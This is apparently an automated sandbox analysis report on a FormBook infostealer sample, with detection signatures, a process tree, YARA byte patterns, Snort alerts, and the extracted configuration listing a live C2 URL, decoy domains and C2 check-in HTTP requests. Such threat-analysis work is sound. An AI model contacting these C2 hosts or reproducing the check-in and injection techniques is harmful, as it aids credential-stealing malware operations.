Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report cryptedprof.exe

Overview

General Information

Sample Name:cryptedprof.exe
Analysis ID:356722
MD5:72efe20e4a59ae2722383b8786956994
SHA1:453b2af3b318668926087556eebfa93eda75d2df
SHA256:d8e0edf1cca3b6edefcd830e233131c593997b5bd4454891dc1b70614862f718
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • cryptedprof.exe (PID: 6980 cmdline: 'C:\Users\user\Desktop\cryptedprof.exe' MD5: 72EFE20E4A59AE2722383B8786956994)
    • cryptedprof.exe (PID: 7064 cmdline: 'C:\Users\user\Desktop\cryptedprof.exe' MD5: 72EFE20E4A59AE2722383B8786956994)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 984 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6592 cmdline: /c del 'C:\Users\user\Desktop\cryptedprof.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.warungsuntik.com/rcv/"], "decoy": ["dorlandoconstruction.com", "houswifekelly.com", "thunderprnet.com", "licipo.com", "ecocotte.com", "xt.show", "sneakerbyhailss.com", "xn--xcke3b8f283o9jzd.com", "1915dobbindr.com", "njbroncosfootball.com", "xn--missrosmakeup-vhb.com", "poertz.com", "20gb-internett-hediye.com", "legalprotech.com", "smarttechnetworks.com", "jamusedwards.com", "smartsettleinfinity.com", "dizesh.com", "gnoccho.com", "historyzapper.com", "sdponcologypatientaid.com", "tabandolano.online", "iveysmotorlodgeme.com", "e-market88.com", "carpetlaunch.com", "creativeladder.net", "bjhysz.com", "befton.ovh", "kehadiransiswa.online", "trunglet.com", "warrenswelding.online", "sculptedspa.com", "avalon78m.online", "diverseworker.com", "sounongwang.com", "sanaugustinegardenresort.com", "active-trinity.com", "thatlocaljawn.com", "myadamandsteve.com", "yourbestpprazdnik.club", "pop2.online", "gavinlurssen.com", "everybodywantstobfamous.com", "shegimx.com", "qbluebaypanowdbuy.com", "peatedbrandy.online", "weightsandweed.com", "remotepowers.com", "yangguangdiannao.com", "ruecedu.com", "honeybadgerpodcast.com", "ivario.cloud", "indeep-events.com", "luzshoesr.online", "lanskyee.com", "chinalsgroup.com", "divanna-box.site", "reginajewerlyco.com", "voshtravels.com", "isahil.tech", "smartloanbuilder.net", "dojosinaptico.com", "finik.clinic", "columbus-luxury-hotels.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.cryptedprof.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.cryptedprof.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.cryptedprof.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.cryptedprof.exe.2a60000.5.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.cryptedprof.exe.2a60000.5.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.warungsuntik.com/rcv/"], "decoy": ["dorlandoconstruction.com", "houswifekelly.com", "thunderprnet.com", "licipo.com", "ecocotte.com", "xt.show", "sneakerbyhailss.com", "xn--xcke3b8f283o9jzd.com", "1915dobbindr.com", "njbroncosfootball.com", "xn--missrosmakeup-vhb.com", "poertz.com", "20gb-internett-hediye.com", "legalprotech.com", "smarttechnetworks.com", "jamusedwards.com", "smartsettleinfinity.com", "dizesh.com", "gnoccho.com", "historyzapper.com", "sdponcologypatientaid.com", "tabandolano.online", "iveysmotorlodgeme.com", "e-market88.com", "carpetlaunch.com", "creativeladder.net", "bjhysz.com", "befton.ovh", "kehadiransiswa.online", "trunglet.com", "warrenswelding.online", "sculptedspa.com", "avalon78m.online", "diverseworker.com", "sounongwang.com", "sanaugustinegardenresort.com", "active-trinity.com", "thatlocaljawn.com", "myadamandsteve.com", "yourbestpprazdnik.club", "pop2.online", "gavinlurssen.com", "everybodywantstobfamous.com", "shegimx.com", "qbluebaypanowdbuy.com", "peatedbrandy.online", "weightsandweed.com", "remotepowers.com", "yangguangdiannao.com", "ruecedu.com", "honeybadgerpodcast.com", "ivario.cloud", "indeep-events.com", "luzshoesr.online", "lanskyee.com", "chinalsgroup.com", "divanna-box.site", "reginajewerlyco.com", "voshtravels.com", "isahil.tech", "smartloanbuilder.net", "dojosinaptico.com", "finik.clinic", "columbus-luxury-hotels.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: cryptedprof.exeReversingLabs: Detection: 27%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: cryptedprof.exeJoe Sandbox ML: detected
          Source: 3.1.cryptedprof.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.cryptedprof.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.cryptedprof.exe.2a60000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: cryptedprof.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: cryptedprof.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: cryptedprof.exe, 00000001.00000003.334189202.0000000002C50000.00000004.00000001.sdmp, cryptedprof.exe, 00000003.00000002.388641562.0000000000BAF000.00000040.00000001.sdmp, msdt.exe, 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cryptedprof.exe, msdt.exe
          Source: Binary string: msdt.pdb source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_00405A15
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004065C1 FindFirstFileA,FindClose,1_2_004065C1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004027A1 FindFirstFileA,1_2_004027A1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 4x nop then pop ebx3_2_00407AFA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx7_2_02C67AFB

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.warungsuntik.com/rcv/
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.thatlocaljawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.warungsuntik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.tabandolano.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: CLAYERLIMITED-AS-APClayerLimitedHK CLAYERLIMITED-AS-APClayerLimitedHK
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.thatlocaljawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.warungsuntik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.tabandolano.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.thatlocaljawn.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Feb 2021 14:32:22 GMTContent-Type: text/htmlContent-Length: 479Connection: closeETag: "601d0d01-1df"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: cryptedprof.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: cryptedprof.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.338525692.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: msdt.exe, 00000007.00000002.594068714.000000000508F000.00000004.00000001.sdmpString found in binary or memory: http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNv
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004054B2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
